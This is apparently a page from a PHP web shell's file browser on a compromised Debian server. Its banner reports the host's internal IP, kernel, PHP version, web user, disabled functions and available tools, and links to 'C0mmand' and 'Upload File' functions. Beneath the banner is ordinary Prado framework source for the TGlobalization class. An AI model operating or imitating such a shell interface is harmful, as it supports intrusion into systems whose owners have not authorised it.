|
Server IP : 10.2.73.233 / Your IP : 216.73.216.59 Web Server : Apache/2.4.59 (Debian) System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 User : www-data ( 33) PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ifk/web/prado4.3.2/I18N/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* TGlobalization class file.
*
* @author Wei Zhuo<weizhuo[at]gmail[dot]com>
* @link https://github.com/pradosoft/prado
* @license https://github.com/pradosoft/prado/blob/master/LICENSE
*/
namespace Prado\I18N;
use Prado\Exceptions\TConfigurationException;
use Prado\Prado;
use Prado\TApplication;
use Prado\TPropertyValue;
/**
* TGlobalization contains settings for Culture, Charset
* and TranslationConfiguration.
*
* TGlobalization can be subclassed to change how the Culture, Charset
* are determined. See TGlobalizationAutoDetect for example of
* setting the Culture based on browser settings.
*
* @author Wei Zhuo<weizhuo[at]gmail[dot]com>
* @since 3.0
*/
class TGlobalization extends \Prado\TModule
{
/**
* Default character set is 'UTF-8'.
* @var string
*/
private $_defaultCharset = 'UTF-8';
/**
* Default culture is 'en'.
* @var string
*/
private $_defaultCulture = 'en';
/**
* The current charset.
* @var string
*/
private $_charset;
/**
* The current culture.
* @var string
*/
private $_culture;
/**
* Translation source parameters.
* @var \Prado\Collections\TMap
*/
private $_translation;
/**
* @var bool whether we should translate the default culture
*/
private $_translateDefaultCulture = true;
/**
* @var bool whether the current culture is Right to Left.
*/
private $_cultureRTL;
/**
* Initialize the Culture and Charset for this application.
* You should override this method if you want a different way of
* setting the Culture and/or Charset for your application.
* If you override this method, call parent::init($xml) first.
* @param mixed $config application configuration
*/
public function init($config)
{
if ($this->_charset === null) {
$this->_charset = $this->getDefaultCharset();
}
if ($this->_culture === null) {
$this->_culture = $this->getDefaultCulture();
}
if ($config !== null) {
if ($this->getApplication()->getConfigurationType() == TApplication::CONFIG_TYPE_PHP) {
$translation = $config['translate'] ?? null;
} else {
$t = $config->getElementByTagName('translation');
$translation = ($t) ? $t->getAttributes() : null;
}
if ($translation) {
$this->setTranslationConfiguration($translation);
}
}
$this->getApplication()->setGlobalization($this);
parent::init($config);
}
/**
* @return string default culture
*/
public function getTranslateDefaultCulture()
{
return $this->_translateDefaultCulture;
}
/**
* @param bool $value default culture, e.g. <tt>en_US</tt> for American English
*/
public function setTranslateDefaultCulture($value)
{
$this->_translateDefaultCulture = TPropertyValue::ensureBoolean($value);
}
/**
* @return string default culture
*/
public function getDefaultCulture()
{
return $this->_defaultCulture;
}
/**
* @param string $culture default culture, e.g. <tt>en_US</tt> for American English
*/
public function setDefaultCulture($culture)
{
$this->_defaultCulture = str_replace('-', '_', $culture);
}
/**
* @return string default charset set
*/
public function getDefaultCharset()
{
return $this->_defaultCharset;
}
/**
* @param string $charset default localization charset, e.g. <tt>UTF-8</tt>
*/
public function setDefaultCharset($charset)
{
$this->_defaultCharset = $charset;
}
/**
* @return string current application culture
*/
public function getCulture()
{
return $this->_culture;
}
/**
* @param string $culture culture, e.g. <tt>en_US</tt> for American English
*/
public function setCulture($culture)
{
if (($culture = str_replace('-', '_', $culture)) != $this->_culture) {
$this->_culture = $culture;
$this->_cultureRTL = null;
}
}
/**
* @return string localization charset
*/
public function getCharset()
{
return $this->_charset;
}
/**
* @param string $charset localization charset, e.g. <tt>UTF-8</tt>
*/
public function setCharset($charset)
{
$this->_charset = $charset;
}
/**
* @return null|\Prado\Collections\TMap translation source configuration.
*/
public function getTranslationConfiguration()
{
return (!$this->_translateDefaultCulture && ($this->getDefaultCulture() == $this->getCulture()))
? null
: $this->_translation;
}
/**
* Sets the translation configuration. Example configuration:
* <code>
* $config['type'] = 'XLIFF'; //XLIFF, gettext, PHP or Database
* $config['source'] = 'Path\to\directory'; // for types XLIFF, PHP and gettext
* $config['source'] = 'connectionId'; // for type Database
* $config['catalogue'] = 'messages'; //default catalog
* $config['autosave'] = 'true'; //save untranslated message
* $config['cache'] = 'true'; //cache translated message
* $config['marker'] = '@@'; // surround untranslated text with '@@'
* </code>
* Throws exception is source is not found.
* @param array|\Prado\Collections\TMap $config configuration options
*/
protected function setTranslationConfiguration($config)
{
if ($config['type'] == 'XLIFF' || $config['type'] == 'gettext' || $config['type'] == 'PHP') {
if ($config['source']) {
$config['source'] = Prado::getPathOfNamespace($config['source']);
if (!is_dir($config['source'])) {
if (@mkdir($config['source']) === false) {
throw new TConfigurationException(
'globalization_source_path_failed',
$config['source']
);
}
chmod($config['source'], Prado::getDefaultPermissions()); //make it deletable
}
} else {
throw new TConfigurationException("invalid source dir '{$config['source']}'");
}
}
if (isset($config['cache']) && TPropertyValue::ensureBoolean($config['cache'])) {
$config['cache'] = $this->getApplication()->getRunTimePath() . '/i18n';
if (!is_dir($config['cache'])) {
if (@mkdir($config['cache']) === false) {
throw new TConfigurationException(
'globalization_cache_path_failed',
$config['cache']
);
}
chmod($config['cache'], Prado::getDefaultPermissions()); //make it deletable
}
} else {
unset($config['cache']);
}
$this->_translation = $config;
}
/**
* @return string current translation catalogue.
*/
public function getTranslationCatalogue()
{
return $this->_translation['catalogue'];
}
/**
* @param string $value update the translation catalogue.
*/
public function setTranslationCatalogue($value)
{
$this->_translation['catalogue'] = $value;
}
/**
* Gets all the variants of a specific culture. If the parameter
* $culture is null, the current culture is used.
* @param string $culture the Culture string
* @return array variants of the culture.
*/
public function getCultureVariants($culture = null)
{
if ($culture === null) {
$culture = $this->getCulture();
}
$variants = explode('_', $culture);
$result = [];
for (; count($variants) > 0; array_pop($variants)) {
$result[] = implode('_', $variants);
}
return $result;
}
/**
* Returns a list of possible localized files. Example
* <code>
* $files = $app->getLocalizedResource("path/to/Home.page","en_US");
* </code>
* will return
* <pre>
* array
* 0 => 'path/to/en_US/Home.page'
* 1 => 'path/to/en/Home.page'
* 2 => 'path/to/Home.en_US.page'
* 3 => 'path/to/Home.en.page'
* 4 => 'path/to/Home.page'
* </pre>
* Note that you still need to verify the existance of these files.
* @param string $file filename
* @param string $culture culture string, null to use current culture
* @return array list of possible localized resource files.
*/
public function getLocalizedResource($file, $culture = null)
{
$files = [];
$variants = $this->getCultureVariants($culture);
$path = pathinfo($file);
foreach ($variants as $variant) {
$files[] = $path['dirname'] . DIRECTORY_SEPARATOR . $variant . DIRECTORY_SEPARATOR . $path['basename'];
}
$filename = substr($path['basename'], 0, strrpos($path['basename'], '.'));
foreach ($variants as $variant) {
$files[] = $path['dirname'] . DIRECTORY_SEPARATOR . $filename . '.' . $variant . '.' . $path['extension'];
}
$files[] = $file;
return $files;
}
/**
* This returns whether or not the current culture or the specified
* culture is right to left orientation. Default $culture is null, which
* equal to using $this->Culture as the parameter.
* @param null|string $culture, default null which makes this grab the current object culture
* @return bool whether or not the specified or current culture is right to left
* @since 4.2.0
*/
public function getIsCultureRTL($culture = null)
{
$currentCulture = $this->getCulture();
if (($culture === null || $culture == $currentCulture) && $this->_cultureRTL !== null) {
return $this->_cultureRTL;
}
if ($culture === null) {
$culture = $currentCulture;
}
$ci = new \Prado\I18N\core\CultureInfo($culture);
$textDirection = $ci->findInfo('layout/characters');
$isRTL = ($textDirection == 'right-to-left');
if ($culture == $currentCulture) {
$this->_cultureRTL = $isRTL;
}
return $isRTL;
}
/**
* This hard sets the IsCultureRTL property to the value.
* @param bool $rtl whether or not the culture is right to left
* @since 4.2.0
*/
public function setIsCultureRTL($rtl)
{
$this->_cultureRTL = TPropertyValue::ensureBoolean($rtl);
}
}